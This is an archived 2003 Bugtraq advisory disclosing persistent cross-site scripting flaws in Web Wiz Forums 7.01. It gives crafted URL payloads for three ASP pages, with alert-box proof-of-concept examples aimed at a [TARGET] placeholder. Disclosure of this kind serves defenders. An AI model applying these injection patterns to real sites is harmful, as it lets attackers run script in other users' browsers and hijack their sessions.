Web Wiz Forums ver. 7.01

To: bugtraq@xxxxxxxxxxxxxxxxx, info@xxxxxxxxxxxxxxxx
Subject: Web Wiz Forums ver. 7.01
From: HEX <hex@xxxxxxxxxx>
Date: Wed, 22 Oct 2003 00:41:35 +0400
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: HEX <hex@xxxxxxxxxx>

Informations :
°°°°°°°°°°°°
Language : ASP
Bugged Version : Web Wiz Forums ver. 7.01 (and less ?)
Patched version : none
Website : http://www.webwizforums.com
Problems : Permanent XSS

Objects :
°°°°°°°
- forum_members.asp
- members.asp

- pm_buddy_list.asp

Exploits :
°°°°°°°°
http://[TARGET]/forum_members.asp?find=%22;}[CODE];function%20x(){v%20=%22

Example: http://[TARGET]/forum_members.asp?find=%22;}ALERT('XSS atack by [HEX] 
(c) [CSL]');function%20x(){v%20=%22

http://[TARGET]/members.asp?SF=%22;}[CODE]function%20x(){v%20=%22

Example: http://[TARGET]/members.asp?SF=%22;}ALERT('XSS atack by [HEX] (c) 
[CSL]');function%20x(){v%20=%22

http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E[CODE]%3Ca%20s=%22&code=1

Example: 
http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E<SCRIPT>ALERT('XSS atack 
by [HEX] (c) [CSL]');</SCRIPT>%3Ca%20s=%22&code=1

Patch/More Details :
°°°°°°°°°°°°°°°°°°
Waiting for the patch at http://www.webwizforums.com...


[ Local time 2:30    | Если б мишки были пчелами... ]
[ Copyright by [HEX] | mailto:hex@xxxxxxxxxx ]

Prev by Date: OpenServer 5.0.5 : Insecure creation of files in /tmp
Next by Date: IE6 & Java 1.4.2_02 applet: Hardware stress on floppy drive
Previous by thread: OpenServer 5.0.5 : Insecure creation of files in /tmp
Next by thread: Re: Web Wiz Forums ver. 7.01
Index(es):
- Date
- Thread